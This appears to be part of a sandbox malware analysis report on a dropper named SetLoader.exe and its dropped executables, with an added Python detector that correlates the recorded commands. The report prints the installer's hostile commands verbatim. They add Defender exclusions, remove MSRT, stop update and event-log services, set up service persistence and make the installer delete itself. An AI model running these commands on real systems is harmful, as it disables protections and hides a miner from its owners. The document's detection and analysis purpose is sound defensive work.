              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5984:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6244:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3544:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6968:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2176:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:916:120:WilError_03
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w3.exeMutant created: \Sessions\1\BaseNamedObjects\My_Program_Already_Present
              Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6700:120:WilError_03
              Source: C:\Windows\System32\dwm.exeMutant created: \BaseNamedObjects\Global\ubhtovowrnkkphnn
              Source: C:\Users\user\Desktop\SetLoader.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0Jump to behavior
              Source: C:\Users\user\Desktop\SetLoader.exeCommand line argument: sfxname0_2_0063037C
              Source: C:\Users\user\Desktop\SetLoader.exeCommand line argument: sfxstime0_2_0063037C
              Source: C:\Users\user\Desktop\SetLoader.exeCommand line argument: pPe0_2_0063037C
              Source: C:\Users\user\Desktop\SetLoader.exeCommand line argument: STARTDLG0_2_0063037C
              Source: C:\Users\user\Desktop\SetLoader.exeCommand line argument: >Gd0_2_00644690
              Source: SetLoader.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w1.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w1.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Windows\System32\wusa.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
              Source: C:\Windows\System32\dwm.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
              Source: C:\Users\user\Desktop\SetLoader.exeFile read: C:\Windows\win.iniJump to behavior
              Source: C:\Users\user\Desktop\SetLoader.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w2.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\ProgramData\PcHealthTool\HealthTool.exeFile read: C:\Windows\System32\drivers\etc\hosts
              Source: SetLoader.exeVirustotal: Detection: 18%
              Source: C:\Users\user\Desktop\SetLoader.exeFile read: C:\Users\user\Desktop\SetLoader.exeJump to behavior
Source: unknown | Process created: C:\Users\user\Desktop\SetLoader.exe "C:\Users\user\Desktop\SetLoader.exe"
Source: C:\Users\user\Desktop\SetLoader.exe | Process created: C:\Users\user\AppData\Local\Temp\RarSFX0\w1.exe "C:\Users\user\AppData\Local\Temp\RarSFX0\w1.exe"
Source: C:\Users\user\Desktop\SetLoader.exe | Process created: C:\Users\user\AppData\Local\Temp\RarSFX0\w2.exe "C:\Users\user\AppData\Local\Temp\RarSFX0\w2.exe"
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w2.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w2.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w2.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w2.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvc
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w2.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauserv
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w2.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop bits
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w2.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvc
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w2.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w2.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
Source: C:\Windows\System32\powercfg.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w2.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
Source: C:\Windows\System32\powercfg.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w2.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
Source: C:\Windows\System32\powercfg.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\powercfg.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w2.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "PcHealthTool"
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w2.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe create "PcHealthTool" binpath= "C:\ProgramData\PcHealthTool\HealthTool.exe" start= "auto"
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w2.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop eventlog
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w2.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe start "PcHealthTool"
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w2.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\user\AppData\Local\Temp\RarSFX0\w2.exe"
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SetLoader.exe | Process created: C:\Users\user\AppData\Local\Temp\RarSFX0\w3.exe "C:\Users\user\AppData\Local\Temp\RarSFX0\w3.exe"
Source: unknown | Process created: C:\ProgramData\PcHealthTool\HealthTool.exe C:\ProgramData\PcHealthTool\HealthTool.exe
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\choice.exe choice /C Y /N /D Y /T 3
Source: C:\ProgramData\PcHealthTool\HealthTool.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\PcHealthTool\HealthTool.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\ProgramData\PcHealthTool\HealthTool.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\ProgramData\PcHealthTool\HealthTool.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvc
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\PcHealthTool\HealthTool.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauserv
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\PcHealthTool\HealthTool.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop bits
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\PcHealthTool\HealthTool.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvc
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\PcHealthTool\HealthTool.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
Source: C:\ProgramData\PcHealthTool\HealthTool.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
Source: C:\Windows\System32\powercfg.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\PcHealthTool\HealthTool.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
Source: C:\Windows\System32\powercfg.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\PcHealthTool\HealthTool.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
Source: C:\Windows\System32\powercfg.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\powercfg.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\PcHealthTool\HealthTool.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe
Source: C:\ProgramData\PcHealthTool\HealthTool.exe | Process created: C:\Windows\System32\dwm.exe dwm.exe
Source: C:\Users\user\Desktop\SetLoader.exe | Process created: C:\Users\user\AppData\Local\Temp\RarSFX0\w1.exe "C:\Users\user\AppData\Local\Temp\RarSFX0\w1.exe"
Source: C:\Users\user\Desktop\SetLoader.exe | Process created: C:\Users\user\AppData\Local\Temp\RarSFX0\w2.exe "C:\Users\user\AppData\Local\Temp\RarSFX0\w2.exe"
Source: C:\Users\user\Desktop\SetLoader.exe | Process created: C:\Users\user\AppData\Local\Temp\RarSFX0\w3.exe "C:\Users\user\AppData\Local\Temp\RarSFX0\w3.exe"
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w2.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w2.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w2.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w2.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvc
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w2.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauserv
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w2.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop bits
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w2.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvc
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w2.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w2.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w2.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w2.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w2.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "PcHealthTool"
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w2.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe create "PcHealthTool" binpath= "C:\ProgramData\PcHealthTool\HealthTool.exe" start= "auto"
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w2.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop eventlog
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w2.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe start "PcHealthTool"
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w2.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\user\AppData\Local\Temp\RarSFX0\w2.exe"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\choice.exe choice /C Y /N /D Y /T 3
Source: C:\ProgramData\PcHealthTool\HealthTool.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\ProgramData\PcHealthTool\HealthTool.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\ProgramData\PcHealthTool\HealthTool.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc
Source: C:\ProgramData\PcHealthTool\HealthTool.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvc
Source: C:\ProgramData\PcHealthTool\HealthTool.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauserv
Source: C:\ProgramData\PcHealthTool\HealthTool.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop bits
Source: C:\ProgramData\PcHealthTool\HealthTool.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvc
Source: C:\ProgramData\PcHealthTool\HealthTool.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
Source: C:\ProgramData\PcHealthTool\HealthTool.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
Source: C:\ProgramData\PcHealthTool\HealthTool.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
Source: C:\ProgramData\PcHealthTool\HealthTool.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
Source: C:\ProgramData\PcHealthTool\HealthTool.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe
Source: C:\ProgramData\PcHealthTool\HealthTool.exe | Process created: C:\Windows\System32\dwm.exe dwm.exe
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
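The process-creation rows above describe one installer chain, run first by w2.exe and repeated by the HealthTool.exe service: Defender exclusions for the user profile, ProgramData and every .exe via Add-MpPreference; removal of the Malicious Software Removal Tool (KB890830) with wusa; stopping the update-related services (UsoSvc, WaaSMedicSvc, wuauserv, bits, dosvc); zeroing the standby and hibernate timeouts with powercfg so the miner is never paused; (re)creating PcHealthTool as an auto-start service whose binary lives under ProgramData; stopping the eventlog service; and a three-second choice delay followed by Del of the installer itself. Each step alone is noisy in a fleet of machines; together, under one parent, they are a strong signal. The Python below is an added example, not code from the Joe Sandbox report or from the sample: it parses rows in the report's "Source: <parent> Process created: <image> <command line>" form (the same fields a Sysmon event ID 1 or Security 4688 record carries), applies one rule per tactic, and flags any parent process that triggers several distinct tactics. The sample rows are copied from the report, with one "Section loaded" row added as noise; the rule names, the threshold of four tactics and the field names are this example's own choices.

```python
"""Correlate process-creation rows into the miner-installer chain documented above.

Added example for this page, not code from the Joe Sandbox report or the sample.
Rows are parsed from the report's "Source: <parent>Process created: <image> <cmdline>"
form (the " | " separated variant is accepted too); rule names, field names and the
default threshold are this example's own.
"""
import re
from collections import defaultdict

PROC_RE = re.compile(r"^Source:\s*(.+?)\s*(?:\|\s*)?Process created:\s*(\S+)\s*(.*)$")

# Services the installer stops so Windows Update and MSRT cannot remove it.
UPDATE_SERVICES = "usosvc|waasmedicsvc|wuauserv|bits|dosvc"

# (rule name, image basenames it applies to, pattern over the command line)
RULES = [
    ("defender_exclusion", {"powershell.exe"},
     re.compile(r"add-mppreference\b.*-exclusion(path|extension)", re.I)),
    ("msrt_removal", {"cmd.exe", "wusa.exe"},                 # KB890830 is the MSRT package
     re.compile(r"/uninstall\b.*/kb:890830", re.I)),
    ("update_service_stop", {"sc.exe"},
     re.compile(r"\bstop\s+(" + UPDATE_SERVICES + r")\b", re.I)),
    ("eventlog_stop", {"sc.exe"}, re.compile(r"\bstop\s+eventlog\b", re.I)),
    ("power_tamper", {"powercfg.exe"},
     re.compile(r"/x\s+-(hibernate|standby)-timeout-(ac|dc)\s+0\b", re.I)),
    ("service_persistence", {"sc.exe"},                      # binpath under a user-writable tree
     re.compile(r'\bcreate\b.*binpath=\s*"?[^"]*\\(programdata|users|temp)\\', re.I)),
    ("self_delete", {"cmd.exe"}, re.compile(r"\bchoice\b.*&\s*del\b", re.I)),
]

# Rows copied from the report (constructed sample; the last row is deliberate noise).
SAMPLE_LINES = [
    r'Source: unknownProcess created: C:\Users\user\Desktop\SetLoader.exe "C:\Users\user\Desktop\SetLoader.exe"',
    r'Source: C:\Users\user\Desktop\SetLoader.exeProcess created: C:\Users\user\AppData\Local\Temp\RarSFX0\w2.exe "C:\Users\user\AppData\Local\Temp\RarSFX0\w2.exe"',
    r"Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w2.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force",
    r"Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1",
    r"Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w2.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart",
    r"Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart",
    r"Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w2.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc",
    r"Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w2.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauserv",
    r"Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w2.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0",
    r"Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w2.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0",
    r'Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w2.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "PcHealthTool"',
    r'Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w2.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe create "PcHealthTool" binpath= "C:\ProgramData\PcHealthTool\HealthTool.exe" start= "auto"',
    r"Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w2.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop eventlog",
    r'Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w2.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe start "PcHealthTool"',
    r'Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w2.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\user\AppData\Local\Temp\RarSFX0\w2.exe"Jump to behavior',
    r"Source: C:\Users\user\Desktop\SetLoader.exeSection loaded: version.dllJump to behavior",
]


def parse_events(lines):
    """Turn process-creation rows into {parent, image, cmdline}; other row kinds are skipped."""
    events = []
    for raw in lines:
        m = PROC_RE.match(re.sub(r"\s*Jump to behavior$", "", raw.strip()))
        if m:
            parent, image, cmdline = m.groups()
            events.append({"parent": parent, "image": image, "cmdline": cmdline.strip()})
    return events


def match_rules(event):
    """Names of the rules a single process-creation event satisfies."""
    image = event["image"].rsplit("\\", 1)[-1].lower()
    hits = []
    for name, images, pattern in RULES:
        if image not in images or not pattern.search(event["cmdline"]):
            continue
        if name == "self_delete":
            # Only count a delayed delete whose target is the spawning process itself.
            m = re.search(r'\bdel\s+"?([^"]+?)"?\s*$', event["cmdline"], re.I)
            if not m or m.group(1).lower() != event["parent"].lower():
                continue
        hits.append(name)
    return hits


def correlate(events, min_categories=4):
    """Map each parent to the sorted rule names it triggered, if enough distinct tactics fire."""
    tactics = defaultdict(set)
    for ev in events:
        tactics[ev["parent"]].update(match_rules(ev))
    return {p: sorted(t) for p, t in tactics.items() if len(t) >= min_categories}


if __name__ == "__main__":
    for parent, names in correlate(parse_events(SAMPLE_LINES)).items():
        print(f"{parent}: {', '.join(names)}")
```

Correlating on the parent image rather than alerting per command is what keeps this usable: a single `sc stop bits` or `powercfg /x` is routine administration, whereas one process that touches Defender exclusions, update services, power settings, service creation and the event log in quick succession is not. In a SIEM the same grouping would key on the parent process GUID within a short time window instead of the image path, and `self_delete` would additionally confirm the file disappeared.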
Source: C:\Users\user\Desktop\SetLoader.exe | Section loaded: api-ms-win-core-synch-l1-2-0.dll
Source: C:\Users\user\Desktop\SetLoader.exe | Section loaded: api-ms-win-core-fibers-l1-1-1.dll
Source: C:\Users\user\Desktop\SetLoader.exe | Section loaded: api-ms-win-core-synch-l1-2-0.dll
Source: C:\Users\user\Desktop\SetLoader.exe | Section loaded: api-ms-win-core-fibers-l1-1-1.dll
Source: C:\Users\user\Desktop\SetLoader.exe | Section loaded: api-ms-win-core-localization-l1-2-1.dll
Source: C:\Users\user\Desktop\SetLoader.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\SetLoader.exe | Section loaded: dxgidebug.dll
Source: C:\Users\user\Desktop\SetLoader.exe | Section loaded: sfc_os.dll
Source: C:\Users\user\Desktop\SetLoader.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\SetLoader.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\SetLoader.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\SetLoader.exe | Section loaded: dwmapi.dll
Source: C:\Users\user\Desktop\SetLoader.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\SetLoader.exe | Section loaded: riched20.dll
Source: C:\Users\user\Desktop\SetLoader.exe | Section loaded: usp10.dll
Source: C:\Users\user\Desktop\SetLoader.exe | Section loaded: msls31.dll
Source: C:\Users\user\Desktop\SetLoader.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\SetLoader.exe | Section loaded: windowscodecs.dll
Source: C:\Users\user\Desktop\SetLoader.exe | Section loaded: textshaping.dll
Source: C:\Users\user\Desktop\SetLoader.exe | Section loaded: textinputframework.dll
Source: C:\Users\user\Desktop\SetLoader.exe | Section loaded: coreuicomponents.dll
Source: C:\Users\user\Desktop\SetLoader.exe | Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\SetLoader.exe | Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\SetLoader.exe | Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\SetLoader.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\SetLoader.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\SetLoader.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\SetLoader.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\SetLoader.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\SetLoader.exe | Section loaded: propsys.dll
Source: C:\Users\user\Desktop\SetLoader.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\SetLoader.exe | Section loaded: edputil.dll
Source: C:\Users\user\Desktop\SetLoader.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\SetLoader.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\SetLoader.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\SetLoader.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\SetLoader.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\SetLoader.exe | Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\SetLoader.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\SetLoader.exe | Section loaded: slc.dll
Source: C:\Users\user\Desktop\SetLoader.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\SetLoader.exe | Section loaded: sppc.dll
Source: C:\Users\user\Desktop\SetLoader.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\SetLoader.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\Desktop\SetLoader.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\SetLoader.exe | Section loaded: pcacli.dll
Source: C:\Users\user\Desktop\SetLoader.exe | Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w1.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w1.exe | Section loaded: version.dll
